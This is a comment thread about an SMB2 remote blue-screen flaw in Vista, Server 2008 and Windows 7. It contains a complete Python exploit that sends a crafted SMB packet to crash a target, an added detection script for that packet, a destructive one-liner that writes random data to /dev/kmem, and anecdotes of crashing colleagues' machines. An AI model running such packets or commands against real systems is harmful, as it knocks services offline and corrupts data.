Windows 7 Reintroduces Remote BSoD
David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy of the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."
If it relies on an SMB2 request, it is most likely restricted to requests from inside the LAN.
Either way, still bad.
...half the world is behind a NAT setup now, and the other half has the Windows firewall enabled. Windows Update exists now, so people will be able to patch quickly and easily when a patch arrives.
Realistically this isn't going to affect many people like the old exploit did.
Still, it's quite comical; maybe this is Microsoft's take on the saying "The old ones are the best". So much for their secure development practices; there's really no excuse for them not picking this one up before release.
It's incredibly unlikely to ever affect anyo
http://twitter.com/onion2k
Need to rebind a key in fluxbox and dig out my "spank" keycap from 2003.... This exploit was pretty effective though, being the modern-day equivalent of a highway driver with a TOW missile.
Good people go to bed earlier.
- Shiny-new interface.
- No annoying "are you sure" popups every 30 seconds like Vista.
- Can run on a 1 gigabyte machine without slowing to a crawl.
It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
Yeah, we read the first three lines of the Wikipedia link, too.
It is by my will alone my thoughts acquire motion; it is by the juice of the coffee bean that the thoughts acquire speed
Although I don't think Windows 7's feature list is stable yet, and I expect to see this one pulled before the release.
Pity.
Having actually tried this on three windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".
"Commodore Amiga is better!"
"No Atari ST is better!"
"No Amiga!"
"No Atari!"
"Amiga!"
"Atari!"
Oh that's not the debate you were looking for? Sorry. Let me update that ancient debate for the modern world:
"Apple Macintosh is better!"
"No Microsoft PC is better!"
"No Apple!"
"No Microsoft!"
"Apple!"
"Microsoft!"
(and ancient debate... just as juvenile today as it was 20 years ago)
I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.
And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.
http://rocknerd.co.uk
...that my fellow Boston Public School graduates are writing for seclists.org.
Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "
Yes, because we been done had seen that explot in the pasts.
Dear $DEITY, are there no proof readers or editors alive on these sites?
they don't like introducing "new" things
A slight correction: they like to introduce new things when it suits them. Why the rewrite of SMB into SMB2? Well, it has some technological advantages you would expect, but according to Wikipedia:
SMB 2 has two big benefits to Microsoft. The first is clear intellectual property ownership. SMB 1 was originally designed by IBM and was shipped on a wide variety of non-Windows operating systems such as SCO Xenix, OS/2 and DEC VMS (Pathworks). It was partially standardised by X/Open and also had draft standards for IETF which lapsed. (See http://ubiqx.org/cifs/Intro.html for historical detail).
The second benefit is a clean break. Microsoft's SMB1 code has to work with a huge variety of SMB clients and servers. A large number of items in the protocol are optional (such as short and long filenames), there are many infolevels for commands (selecting what structure is returned to a particular request), Unicode was a later addition etc. With SMB2 there is significantly reduced compatibility testing (currently only other Windows Vista clients and servers). Additionally the code is a lot less complex since there is far less variability (e.g. there is no need to worry about having Unicode and non-Unicode code paths as SMB2 requires Unicode support).
So you can see they like to introduce new things when it means they have clear intellectual property ownership rights over it and also a lot less work for them. They also don't have to be backwards compatible with their own products.
While SAMBA 4.0 has experimental support for SMB2 interfacing, I'm guessing the "clear intellectual property" could spell trouble moving forward for Tridgell and the SAMBA team.
My work here is dung.
Let me Loony Tunes that up for you:
Wabbit Season!
Duck Season!
Wabbit Season!
Duck Season!
Summation 2
IT departments are going to keep everything patched, and individuals aren't going to do it to themselves on their LANs. Between firewalls and NATs, it's not going to happen over the internet. Really, the only situation that I can imagine this happening in is perhaps on a university network.
Don't take life so seriously. No one makes it out alive.
Hi. I'm an adult. I work as a software engineer.
I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.
I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.
If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.
1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.
2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.
3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.
4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.
"And not exploitable out of the box since SMB and SMBv2 are both firewalled"
What do you mean? Is this firewall the software one built into Vista or an external one? If it's the built-in one, then it's relying on the same TCP/IP stack to protect it.
Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008
:) normal value should be "\x00\x00"
/joke
The exploit (which is actually ridiculously simple) goes as follows:

```python
#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
    "\x00\x00\x00\x90"  # Begin SMB header: Session message
    "\xff\x53\x4d\x42"  # Server Component: SMB
    "\x72\x00\x00\x00"  # Negotiate Protocol
    "\x00\x18\x53\xc8"  # Operation 0x18 & sub 0xc853
    "\x00\x26"          # Process ID High: -->
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
```
Current problem solution: disable the SMB protocol on your infrastructure.
Now please excuse me, I have to go and play a bit with our network admin.
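A defender-side check for the request format this post describes, written here as an added example and not code from the thread: it parses the 32-byte SMB1 header laid out in the annotated buffer above, pulls out the dialect list, and flags a Negotiate request whose Process ID High field is non-zero (the thread notes the normal value is 00 00). The field offsets follow the posted buffer's annotations; both sample packets are constructed.

```python
import struct

SMB_MAGIC = b"\xffSMB"          # SMB1 protocol id that opens every 32-byte header
SMB_COM_NEGOTIATE = 0x72        # command byte of the Negotiate Protocol request


def build_negotiate_request(pid_high, dialects):
    """Constructed sample traffic: NetBIOS session header + SMB1 header + Negotiate body."""
    body = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = (
        SMB_MAGIC
        + struct.pack("<BIBHH", SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, pid_high)
        + b"\x00" * 8                                   # security signature
        + b"\x00" * 2                                   # reserved
        + struct.pack("<HHHH", 0xFFFF, 0xFEFF, 0, 0)    # TID, PIDLow, UID, MID
    )
    smb = header + b"\x00" + struct.pack("<H", len(body)) + body   # WordCount=0, ByteCount
    return b"\x00" + len(smb).to_bytes(3, "big") + smb            # session message + length


def parse_smb1(data):
    """Split a NetBIOS session message into SMB1 header fields; None if it is not SMB1."""
    if len(data) < 36 or data[0] != 0:
        return None
    if int.from_bytes(data[1:4], "big") != len(data) - 4:
        return None
    hdr = data[4:36]
    if hdr[:4] != SMB_MAGIC:
        return None
    cmd, status, flags, flags2, pid_high = struct.unpack("<BIBHH", hdr[4:14])
    tid, pid_low, uid, mid = struct.unpack("<HHHH", hdr[24:32])
    return {"command": cmd, "status": status, "flags": flags, "flags2": flags2,
            "pid_high": pid_high, "tid": tid, "pid_low": pid_low, "uid": uid,
            "mid": mid, "body": data[36:]}


def negotiate_dialects(body):
    """Dialect names from a Negotiate body: WordCount, ByteCount, then 0x02-prefixed strings."""
    if len(body) < 3 or body[0] != 0:
        return []
    byte_count = struct.unpack_from("<H", body, 1)[0]
    blob = body[3:3 + byte_count]
    return [d[1:].decode("ascii", "replace") for d in blob.split(b"\x00") if d[:1] == b"\x02"]


def check_negotiate(data):
    """Return a finding for a Negotiate request with non-zero ProcessIDHigh, else None.

    The thread's posted request carries 0x26 in that field (bytes 00 26 on the wire) and
    says the normal value is 00 00, so anything non-zero is worth alerting on.
    """
    pkt = parse_smb1(data)
    if pkt is None or pkt["command"] != SMB_COM_NEGOTIATE:
        return None
    if pkt["pid_high"] == 0:
        return None
    return "SMB Negotiate with ProcessIDHigh=0x%04x (dialects: %s)" % (
        pkt["pid_high"], ", ".join(negotiate_dialects(pkt["body"])))


# Constructed samples: a normal request and one shaped like the thread's crash packet.
DIALECTS = ["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "NT LM 0.12", "SMB 2.002"]
GOOD_REQUEST = build_negotiate_request(0x0000, DIALECTS)
BAD_REQUEST = build_negotiate_request(0x2600, DIALECTS)

if __name__ == "__main__":
    for name, pkt in (("good", GOOD_REQUEST), ("bad", BAD_REQUEST)):
        print(name, check_negotiate(pkt))
```

The same check can be run over reassembled TCP/445 streams from a capture; non-SMB data and non-Negotiate commands return None.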
No we didn't. Shut up.
Ooohhhhh, my head.
It's NOT me! It's the meds! I'm on 1000mg of Fukitol.
Or to be more apt (for slashdot)... some people prefer Ford, some prefer Dodge, others still prefer Toyota. Gas is better for some applications, while Diesel is better for others, while electric is better for others.
When a new car line comes out, new defects are to be expected on occasion. Sometimes there are even defects present that were fixed in previous models.
I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.
When in danger or in doubt, run in circles, scream and shout. --Robert A. Heinlein
The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.
Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have twist and stretch like taffy to make the case"?
It wouldn't be so bad but the body of the submission is incredibly slanted, almost more than some of the replies.
Politics is the art of looking for trouble, finding it everywhere, diagnosing it incorrectly and applying the wrong fix.
Let us hope Samba does not replicate this with its SMB2 Server.
Speaking of going back to the '90s...
Why is /. using frames?
Oh, I'm sure on the back end it's some web 2.0 dynamic XCSS crap, but on the front end, it looks like a frame, it walks like a frame, it quacks like a frame.
It's a frame.
In firefox 3, I go to slashdot.org. Then I click a link to the IT section. Browser address bar still reads "slashdot.org" (no IT.)
I click a story link, then click the back button.
The browser goes back to slashdot.org, not it.slashdot.org.
Seriously, WTF?
Out of any sufficiently large community, some will engage in the sort of things you describe, or similar or complementary things. Corporate marketing campaigns are largely relying upon evoking those sentiments in the people they target (irrational 'we're #1' mentality without substantial real justification).
1) The chances of making every last Linux user refrain from that are about as likely as having every last Windows user refrain from considering every last willing Linux user an elitist snob who engages in what you describe.
2) That is true, though the severity of your example is far, far less bad. I would use one of the various local privilege escalation vulnerabilities (some of which were in the kernel undiscovered almost as long as this was in Windows), though even that isn't quite as severe as an unprivileged remote crash in some measures (in others, admittedly, DoS is much less bad than privilege escalation, though I rarely hear of Windows infrastructures banking on avoiding local privilege escalation much).
3) Again, this may be true of some of the community; it is also true of the Windows community (look at a few random message boards, you'll see Windows users looking equally foolish).
4) I don't see a correlation between meme-spouting and linux usage. I also see no evidence that Linux people like xkcd any more than non-linux people (though I don't see how xkcd is construed as a particularly bad thing).
In short, if you want a community larger than 30-50 people that is completely devoid of people who fail to meet your standards, you might as well give up on any community.
XML is like violence. If it doesn't solve the problem, use more.
But none of those vehicles are self crashing.
Change is certain; progress is not obligatory.
So I'm reading a lot about this is no big deal because most places have it firewalled off, or most people are behind NAT, etc, etc...
OK, well, tell that to a place like a college that has 50,000 student accounts who all need access to file servers to get their files. You can't just turn off file sharing or block them on the firewall. All it takes is for one 1337 user to show off his mighty hacker skillz by BSOD'ing the servers to ruin things.
At least where I work we are still at 2003 Server -- thankfully.
See this: http://www.heise.de/security/Luecke-in-Windows-Vista-und-7-ermoeglicht-Neustart-aus-der-Ferne--/news/meldung/144986 (German). heise tested the available exploit and found Vista affected but not Windows 7.
hahaha only on slashdot would that be modded 'informative'
nice work :)
When this packet hits a pocket on a socket on a port,
Your whole damn OS pauses to abort...
kmem russian roulette: Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
... this can't be possible. Windows is made by *professionals*. If anything, those Linux amateurs are just trying to smear Microsoft with lies. .... jokes aside... It's a shame that microsoft has so much fackin revenue and yet their products are always seemingly half-assed. Throw another million at it! The guy who discovered this exploit should be on your payroll! ... oh wait.. the execs and stockholders aren't rich enough yet!
I wonder how the math works out when comparing advertising and investing in politicians (lobbies) vs developing a solid product in terms of ROI.
My favorite SMB2 exploits are detailed here.
Unfortunately, any group tends to have its selection of self-important, infantile, self-righteous whiners. Equally unfortunately, they tend to be the more vocal members of said groups.
Don't let the leetiods scare you off, there are plenty of sane linux users or admins around here. Filter out the rest and all will be well.
Mind you, Linux is for those that have a reason to use it (even if the reason is just curiosity), so exempting the leetiots perhaps you need a stronger reason yet to "join the community," just don't worry that a frontal lobotomy is a requirement for such.
'Cause this can be prevented pretty easily by blocking the SMB ports, and if you're a business you'd be insane not to have a firewall anyway.
I've abandoned my search for truth; now I'm just looking for some useful delusions.
Back in October 1998, Microsoft fixed a vulnerability in Internet Explorer 4 where a dotless IP address (represented as a single, unsigned 32-bit integer, which was legal in IPv4) would be treated as being on the local network rather than on the Internet at large. Basically, their programmers took a shortcut and assumed "no dots = local". (MS98-016)
This was re-introduced in IE 5 three years later and had to be fixed AGAIN. (MS01-051)
I've been waiting to see if they end up re-introducing this one, or if they learned their lesson well enough the last time.
As Joel Spolsky points out, this is exactly what happens when you rewrite software. The old software had lots of bug fixes. If your development shop made a particular mistake once, it's likely to do it again when you reimplement. It's unclear whether this was the case for IE 5 (no idea if that area of the code was rewritten), but it seems like this may have bitten Microsoft with the teardrop vulnerability.
My coworker and I tried this on an updated Windows 2008 today and neither of us could believe what happened. The server just dies mid-air and throws a proud BSOD.
Am I the only one surprised something like this could slip through all the supposed testing done by Microsoft? Have they even run a fuzzer against their code at all? If blatantly obvious holes like this go unseen in the new TCP/IP SMB2 code, rest assured a whole slew of new holes will be found later.
The funniest thing is that this doesn't affect XP while Microsoft touts Windows 7/2008 as the safest OS ever. I guess it's all marketing and just blatantly nothing done about security other than to blame everything on the user by passing every security decision onto the user with UAC.
HTTP/1.1 400
I've only been able to get this to work against Vista Ultimate SP2 and Windows Server 2008 SP2. I've not gotten this to work on Windows 7 RTM and Windows 2008 RTM yet... and yes, I disable the firewalls to be sure.
Watch out Marty....the Flux capacitor is at full capacity and a Smurf attack is imminent!
WTF? Over?
I think you'd get alcohol poisoning half-way through the drinking game.
But I have fond memories of the exploit called WinNuke to cause the BSOD. Back in the day, I was a freshman in college and a football player on our floor was continuously giving me a hard time. In those days, we telnetted into the DEC Alpha to check our email. Also, in those days our IPs were statically assigned and we had no firewall. Those were quite obviously better, more trusting days of the internet. Anyhow, one day I waited until I knew he was in his room and checking email from his computer. I used finger on UNIX to get his IP address. Then, nuke away! I could hear him banging, cussing, and throwing his stuff around. So, whenever I needed a little fun, I simply delivered that little exploit. One day he came back from a drunken binge and went to check his email and I felt it was a perfect time to test his patience level. After carefully delivering the little packet, I heard a smashing sound. My guess is he decided to do a body slam, WWF style, on his PC. As I walked by I casually asked what happened as I saw the computer smashed to smithereens. He told me to, "Get outta here, shit nugget!" It was all I could do to keep from bursting out laughing. Moral: Leave the IT guy alone.
Not tested, but Petri is a pretty solid resource: http://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm
body massage!
I don't care, I'm still very fond of 7 (running RTM for a month was a pleasant experience). I'm actually signed up to throw a party, although I won't throw any party, I just want a free copy of 7 lol. No OS is perfect; 7 is definitely a nice change of pace from XP, and Vista, like ME, should be forgotten asap.
Visit my Forums?
Just to clarify the comment prior to mine...
Simply adding a linefeed in the right place in the comment would perform the import properly. In other words, the GP post says:
and it should be
I love it when Microsoft self-sabotages. Windows 7 was already being called "Vista: Fixed"; now it's introducing fun new ways for "Vista" to fail. But let's be fair to Microsoft; they don't like introducing "new" things, so in tune with this philosophy, they're merely re-releasing an old problem and packaging it differently ;)
This is actually introduced with Vista, and not Win7 -- making the title and summary just wrong. Something new and different for /....
Ummm... well done and truly informative, the way you copied and pasted directly from the security bulletin linked to in TFS...
Back in the mid/late 90's, we had a Btrieve-based app running on our Novell network. The client app ran on each local workstation, Win95 at the time. One of the resident computer experts (helpdesk guy) discovered a "tool" that would allow him to send the ping o'death to any machine on the network. He amused himself merrily, randomly crashing machines for nearly a week. Problem was, each time he crashed a machine, the Btrieve database would get corrupted or records would be left locked, requiring intervention by me to get things working again. Once I figured out who was doing it, I warned him to stop. He didn't, so I reported him to senior management. He was fired immediately.
Of course it is _VERY_SERIOUS_: unprivileged user-land electively crashes the kernel of every machine it can route TCP packets to. WTF, are you stupid or something?
Ah the good old days of early IRC, watching people go poof on a regular basis.
---- Booth was a patriot ----
I've just tested it on 3 of my Server 2008 R2 machines here (final build, technet ftw). It was unable to crash any of them. I wonder if 2008R2 has any new SMB code we don't know about yet?
Note: all 3 2008R2 machines have open (guest-authable) fileshares available via SMB.
What's wrong Twitter? All of your accounts in karma hell? BTW, your suicide comment you made only shows your stupidity.
Friends don't help friends install Communist Linsux.
SMB2 is not required, it can be disabled.
From an Administrative prompt issue the follow:
"net stop mrxsmb20"
To make the change permanent, also issue:
"sc config lanmanworkstation depend= bowser/mrxsmb10/nsi"
"sc config mrxsmb20 start= disabled"
Seriously, why is everyone getting so bent over something that is a three-line permanent fix?
FOOL! You're NOT supposed to PROVIDE THE FIX!!!!!!!!
I can already see the script-kiddy hordes descending on your post!!!!!
That's one way to crash a Windows 7 party.
Also, it isn't related to the TCP/IP stacks, or the teardrop attack. It is totally unrelated, except that it causes a BSoD.
There are times, like the recent article about how Microsoft photoshopped a black guy out of some marketing material destined for Poland where there are no black people, where I find the frantic voices of Slashdot bashing Microsoft irrational and too strident.
And then there are the far more numerous articles where there's some real problem with a current Microsoft product where some people feel determined to defend Microsoft no matter how much they must stretch reason or reach to find offense in the poster.
Your post is more of the latter than the former -- and so I must wonder how it became moderated so well. Twice interesting and once overrated. That's maybe more than I would give it.
Help stamp out iliturcy.
Tested this on my own system, using my Linux dev box to attack Windows 7 running inside VirtualBox 3. No luck, Windows just sits there.
What's a BSoD?
I am not devoid of humor.